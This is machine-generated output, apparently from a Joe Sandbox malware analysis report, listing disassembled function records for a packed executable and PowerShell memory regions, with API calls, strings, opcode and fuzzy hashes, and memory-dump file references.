                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 1061551593-3887548279
                                                                                                                                              • Opcode ID: 48fc52adf7e174344e39e427821b9ebe6d198607fcaf3de4f1fda3b5e11ae162
                                                                                                                                              • Instruction ID: b065a553c4e76bcce231028e33b61764f4b10df2e01789fe794bf1081c8183dc
                                                                                                                                              • Opcode Fuzzy Hash: 48fc52adf7e174344e39e427821b9ebe6d198607fcaf3de4f1fda3b5e11ae162
                                                                                                                                              • Instruction Fuzzy Hash: 626122B1218305AFD214DF64C884E6BBBE8FF89744F10492DF699CB220D671E955CB62
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _swprintf
                                                                                                                                              • String ID: %ls$%s: %s
                                                                                                                                              • API String ID: 589789837-2259941744
                                                                                                                                              • Opcode ID: e41accadfb7b31693eb1585ae95d8efb9d16aa4f4eb7b5ae42bdf73359179a38
                                                                                                                                              • Instruction ID: 659064c7dad79ba0a23bba81232b5cfd190caa905f8af8681c13eaf5a9119b86
                                                                                                                                              • Opcode Fuzzy Hash: e41accadfb7b31693eb1585ae95d8efb9d16aa4f4eb7b5ae42bdf73359179a38
                                                                                                                                              • Instruction Fuzzy Hash: 4A51C6312BC30DFAFA211A90CDC6F3AF5599B04B88F608536F78A644E7D5E169707A02
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E7575
                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E7711
                                                                                                                                                • Part of subcall function 002EA12F: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA143
                                                                                                                                                • Part of subcall function 002EA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA174
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Attributes$H_prologTime
                                                                                                                                              • String ID: :
                                                                                                                                              • API String ID: 1861295151-336475711
                                                                                                                                              • Opcode ID: bfe7d25d51d18f47539dac6a4d95eaaa18c9fbe13d7edbeb01568659fd0f6172
                                                                                                                                              • Instruction ID: 67133ded7748a3205e2576401bd86d321c592f6a9071e4975cddfdc8f71409ed
                                                                                                                                              • Opcode Fuzzy Hash: bfe7d25d51d18f47539dac6a4d95eaaa18c9fbe13d7edbeb01568659fd0f6172
                                                                                                                                              • Instruction Fuzzy Hash: A841DA71894198AADB25EB66CC55EEFB37CEF45340F8040E9B505A7082DB705FA4CF61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                              • API String ID: 0-253988292
                                                                                                                                              • Opcode ID: ce0356ffd8b1c4d1b1175da42cf8ee8386e0562dacdb38ceedeb0ff06ac3676c
                                                                                                                                              • Instruction ID: eed0ca2ff8a0b7375eafd1d20648a704001ef6f720872839ec40954674af2bd2
                                                                                                                                              • Opcode Fuzzy Hash: ce0356ffd8b1c4d1b1175da42cf8ee8386e0562dacdb38ceedeb0ff06ac3676c
                                                                                                                                              • Instruction Fuzzy Hash: CB41EB354A02DA7ACF23AF63CC61EEB7769AF05351F808065F85497282E77499B0DF90
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0030EA9F,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E70C
                                                                                                                                              • GetLastError.KERNEL32(?,0030EA9F,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E735
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 442123175-2989149754
                                                                                                                                              • Opcode ID: 09a5c12f17fb5156477d4c0564c91b70bfffcb5e091c08e193d42767472adbd2
                                                                                                                                              • Instruction ID: 082a0b7cdbcb7cefa9cf9b20e2b796a90a017025121e02bb9b58ee7c648708b6
                                                                                                                                              • Opcode Fuzzy Hash: 09a5c12f17fb5156477d4c0564c91b70bfffcb5e091c08e193d42767472adbd2
                                                                                                                                              • Instruction Fuzzy Hash: 67319171B112199BCB25CF69DC809DAF3FAEF48710F1088AAE509D72A0E730A981CB54
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0030EABF,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E61E
                                                                                                                                              • GetLastError.KERNEL32(?,0030EABF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E647
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 442123175-2989149754
                                                                                                                                              • Opcode ID: 9c2490903c6f2642ed60500c36732cf02e32362a88dc01e18aaf5f4557c85a6d
                                                                                                                                              • Instruction ID: 4a91f12921bba1a4b6b7587625cfd7a80d58be152241f3840c1717d9eb343f12
                                                                                                                                              • Opcode Fuzzy Hash: 9c2490903c6f2642ed60500c36732cf02e32362a88dc01e18aaf5f4557c85a6d
                                                                                                                                              • Instruction Fuzzy Hash: D021E175B002189FCB26CF59DC90BEAB3F9EB08301F1048AAE94AD3291D730AD81CF10
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Shell.Explorer$about:blank
                                                                                                                                              • API String ID: 0-874089819
                                                                                                                                              • Opcode ID: 98392b4bc3fa5d948ea2cf7e655a167c7ea3e3d04aa5e82b0ed6e51cc37248c9
                                                                                                                                              • Instruction ID: 4c1889d8481b554ffbcde36f0dde0dab5f49f328110ec58f7ecd9563d591795c
                                                                                                                                              • Opcode Fuzzy Hash: 98392b4bc3fa5d948ea2cf7e655a167c7ea3e3d04aa5e82b0ed6e51cc37248c9
                                                                                                                                              • Instruction Fuzzy Hash: DB21507162060ABFD7049FA4C895E76F768FF49390B04413AE61587682DF70E861CB91
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(000104A4), ref: 002FCA6D
                                                                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,000104A4,002FA0B0,?,?), ref: 002FCAA9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DialogParamVisibleWindow
                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                              • API String ID: 3157717868-3292211884
                                                                                                                                              • Opcode ID: 78429543ced1f82f5d06d03595cbf3b771e5e22d55163c4faf1c8c53b57df64f
                                                                                                                                              • Instruction ID: 69078c8a102dfb422d313089ff71790a6fd38376de6f8c575e9beaed24583742
                                                                                                                                              • Opcode Fuzzy Hash: 78429543ced1f82f5d06d03595cbf3b771e5e22d55163c4faf1c8c53b57df64f
                                                                                                                                              • Instruction Fuzzy Hash: 93113B3222420C66DB23DE349D02BFBB398BB0E750F144079FE49A7181C7B4AC60D794
                                                                                                                                              APIs
                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002FE82E
                                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 002FE915
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 3761405300-2989149754
                                                                                                                                              • Opcode ID: e6a992773637b92997f374ce642847ff527b9ed85b26530e5400beca2914ef88
                                                                                                                                              • Instruction ID: 9e1c6ea886b6d75bc6c2a34572f7eda7bfa97b9ad03630ee8635d6cf458f4b89
                                                                                                                                              • Opcode Fuzzy Hash: e6a992773637b92997f374ce642847ff527b9ed85b26530e5400beca2914ef88
                                                                                                                                              • Instruction Fuzzy Hash: C821FEB59102049FDB06DF18FAC2A54BBA8FB0A710F90417AEE08CB3B5E3B05881CF40
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002ED70B: _swprintf.LIBCMT ref: 002ED731
                                                                                                                                                • Part of subcall function 002ED70B: _strlen.LIBCMT ref: 002ED752
                                                                                                                                                • Part of subcall function 002ED70B: SetDlgItemTextW.USER32(?,0031D154,?), ref: 002ED7B2
                                                                                                                                                • Part of subcall function 002ED70B: GetWindowRect.USER32(?,?), ref: 002ED7EC
                                                                                                                                                • Part of subcall function 002ED70B: GetClientRect.USER32(?,?), ref: 002ED7F8
                                                                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                              • SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 2622349952-4108050209
                                                                                                                                              • Opcode ID: d6455289ed35fa6ccfe01f7ef7142335357fa927b551e150d14c1559e2339534
                                                                                                                                              • Instruction ID: 7ff0c3c939e427cdcbf39442a84222cdb816154509298c22d6df9f21ef24b347
                                                                                                                                              • Opcode Fuzzy Hash: d6455289ed35fa6ccfe01f7ef7142335357fa927b551e150d14c1559e2339534
                                                                                                                                              • Instruction Fuzzy Hash: D7F0C8705902C9A7DF160F229C0ABF93B6DAF09344F408064FC55514A1C778C5B5DB10
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free
                                                                                                                                              • String ID: FlsFree$S#~>
                                                                                                                                              • API String ID: 3978063606-2254333746
                                                                                                                                              • Opcode ID: 30d39b952b6634c4923e13c092a75c63467ebf998dbc3380dc6c8064ea225f77
                                                                                                                                              • Instruction ID: 010b251b66a135e5c5a6947f6742fb06620680573703065ac9c7453bc52d2704
                                                                                                                                              • Opcode Fuzzy Hash: 30d39b952b6634c4923e13c092a75c63467ebf998dbc3380dc6c8064ea225f77
                                                                                                                                              • Instruction Fuzzy Hash: 1DE05571A06208A7C613ABA0AC02FFEBB68DB0CB20F01006AFD055B2C1DA700E20D6C9
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,002F05D9,?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04C0
                                                                                                                                              • GetLastError.KERNEL32(?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04CC
                                                                                                                                                • Part of subcall function 002E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E6CEC
                                                                                                                                              Strings
                                                                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002F04D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                              • API String ID: 1091760877-2248577382
                                                                                                                                              • Opcode ID: 75b4c6a6953823a1c202d534b6cf7ef3ff1653dc7a0fc8ab84fbd1005309d22e
                                                                                                                                              • Instruction ID: 603e1b1026c976c4e11c5de8c03d4b22f8b46458f036a302265ada1e7f15e204
                                                                                                                                              • Opcode Fuzzy Hash: 75b4c6a6953823a1c202d534b6cf7ef3ff1653dc7a0fc8ab84fbd1005309d22e
                                                                                                                                              • Instruction Fuzzy Hash: E0D05E3155903267D60627246C0EEEF791ADB2A3B0FA0C719FA35652F6CA200CB1C6D6
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,002ECFBE,?), ref: 002ED6C6
                                                                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,002ECFBE,?), ref: 002ED6D4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                              • String ID: RTL
                                                                                                                                              • API String ID: 3537982541-834975271
                                                                                                                                              • Opcode ID: f146e6a44e0b6c2924d17ff08c204c3ea65bc8e29b750cd4161201a05a90873c
                                                                                                                                              • Instruction ID: 0057dac7389d70c411883c257dbd7ac3b6e87d303db973a4cdce4aa8929d7a99
                                                                                                                                              • Opcode Fuzzy Hash: f146e6a44e0b6c2924d17ff08c204c3ea65bc8e29b750cd4161201a05a90873c
                                                                                                                                              • Instruction Fuzzy Hash: 87C01231A8135266EB361B317D0DBC32A4CAB0CB12F1A0548FA85DA1D0DAE5C8A0C6A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 38d822f8d009720deaa4902f641c74b10174f58f74d4bf30c37bedef05afb536
                                                                                                                                              • Instruction ID: e26a86b06fc46e1cade71ef1d0836f31f7a4c4daa526d112a324df5b493fbb46
                                                                                                                                              • Opcode Fuzzy Hash: 38d822f8d009720deaa4902f641c74b10174f58f74d4bf30c37bedef05afb536
                                                                                                                                              • Instruction Fuzzy Hash: 0B917EB1B407146FEB55EFB888109AEBBE3EF84B00B00891DD506AB750DF74AE059BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b234a9b176ef048fb86449fb8b10a801b7cf4bd43fd198169bdc08a82be1e015
                                                                                                                                              • Instruction ID: 9e5fd66ae69694616f301db737f9aa08b1ab101756f49a7cb4183cca138b6d30
                                                                                                                                              • Opcode Fuzzy Hash: b234a9b176ef048fb86449fb8b10a801b7cf4bd43fd198169bdc08a82be1e015
                                                                                                                                              • Instruction Fuzzy Hash: 29916FB1B407146FEB55EFB888109AEBBE3EF84B00B00891DD506AB750DF74AE059BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1908846068.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_6e20000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: abf98f8b224eb99bfb39634f00846e500dc47d59e0895c96f56420fb530ba04a
                                                                                                                                              • Instruction ID: 0061ed423a455555a2f5b756ff37c4565638654082d60ca5a0bdfef8933a57cb
                                                                                                                                              • Opcode Fuzzy Hash: abf98f8b224eb99bfb39634f00846e500dc47d59e0895c96f56420fb530ba04a
                                                                                                                                              • Instruction Fuzzy Hash: F7225831B10326DFDB648F69D8407AAB7E7EF89214F14807AEA05CB251DB75CE41C7A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1908846068.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_6e20000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27107c4c4b98c3883e36ae938684c1797f5ee87c9011ec10f0c1c1445973bbf6
                                                                                                                                              • Instruction ID: fc65480e11ca23eb83dc41b4c6c76a7c6dcaefdd8b868b3c4a0182ea7ee4c926
                                                                                                                                              • Opcode Fuzzy Hash: 27107c4c4b98c3883e36ae938684c1797f5ee87c9011ec10f0c1c1445973bbf6
                                                                                                                                              • Instruction Fuzzy Hash: 99120932B04326CFD7559B68D8007AABBE3AF85254F14807AD506CB391DA79CD85CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 523162a6de040eb68f63a3d211c9a7da4d4f15b777279144d5b8b2f708d74daa
                                                                                                                                              • Instruction ID: 84c741d759d146851589e8a74c1a0b98bb1f907ebf2a20715794b783eb5203f2
                                                                                                                                              • Opcode Fuzzy Hash: 523162a6de040eb68f63a3d211c9a7da4d4f15b777279144d5b8b2f708d74daa
